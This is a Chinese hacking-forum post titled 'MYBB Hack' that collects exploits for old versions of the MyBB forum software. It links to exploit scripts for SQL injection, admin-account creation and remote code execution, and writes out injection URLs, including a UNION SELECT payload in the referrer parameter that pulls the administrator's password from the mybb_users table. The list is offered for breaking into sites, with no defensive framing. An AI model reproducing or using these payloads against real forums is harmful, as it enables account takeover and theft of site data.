|
 
- 帖子
- 270
- 积分
- 733
- 威望
- 1168
- 金钱
- 874
- 在线时间
- 2 小时
  
|
[转载]MYBB Hack
MyBB <= 1.00 RC4
SQL Injection Exploit
Exploit:
http://milw0rm.org/exploits/1022
http://milw0rm.org/exploits/1172
MyBB 1.0.2
Quote:http://www.strona.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3
MyBB 1.03
Quote:http://www.example.com/moderation.php?posts=[pid]|&tid=[pid]&action=do_multimergeposts&sep=hr
MyBB <= 1.04
收集的MYBB 漏洞 BY 混世魔王
Wys?any: 2006-12-04, 21:17 myBB Hack
MyBB <= 1.00 RC4
SQL Injection Exploit
Exploit:
http://milw0rm.org/exploits/1022
http://milw0rm.org/exploits/1172
MyBB 1.0.2
Kod:
http://www.strona.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3
MyBB 1.03
Cytat
http://www.example.com/moderation.php?posts=[pid]|&tid=[pid]&action=do_multimergeposts&sep=hr
MyBB <= 1.04
Exploit:
http://www.security.nnov.ru/files/mybbex.pl
MyBB <= 1.1.2
Quote:http://www.strona.com/index.php?referrer=9999999999'%20UNION%20SELECT%20 password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,
3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_us ers%20WHERE%20uid=1*
remote code execution
Exploit:
http://www.security.nnov.ru/files/mybibi.pl
MyBB <= 1.1.3
Create Admin Exploit
Exploit:
http://milw0rm.org/exploits/1950
MyBB <= 1.1.5
'CLIENT-IP' SQL injection / create new admin exploit
Exploit:
http://www.security.nnov.ru/files/mybbsipsql.php取保候审中........
  
帖子181 精华10 积分3720 阅读权限100 性别男 在线时间88 小时 注册时间2005-3-12 最后登录2008-6-19 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?
19830821 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-21 00:55
| 